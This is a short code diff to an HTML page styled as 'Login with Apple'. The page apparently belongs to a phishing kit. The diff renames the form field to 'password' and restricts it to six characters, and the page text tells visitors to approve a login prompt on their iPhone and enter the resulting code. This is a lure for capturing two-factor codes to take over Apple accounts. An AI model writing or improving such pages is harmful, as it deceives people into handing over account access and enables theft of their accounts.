--- a/apple2.html
+++ b/apple2.html
@@ -19,7 +19,7 @@
     <form action="./index.html" method="get" name="form">
         <h3>Login with Apple <i class="fab fa-apple"></i></h3>
         <label for="username">Check your Iphone</label>
-        <input type="text" placeholder="Code" name="username" id="username" class="login" required>
+        <input type="text" placeholder="Code" name="password" id="password" class="login" maxlength="6" minlength="6" required>
         <p style="font-size: 12px; padding-top: 10px;">Please, do not exit the page!<br/> Within one minute, a login confirmation window will appear on your iPhone, click allow login and you will see a window with a six-digit login code, which must be entered in the field above.</p>
         <button type="submit"><i class="fab fa-apple" style="color: black;"></i></button>
     </form>
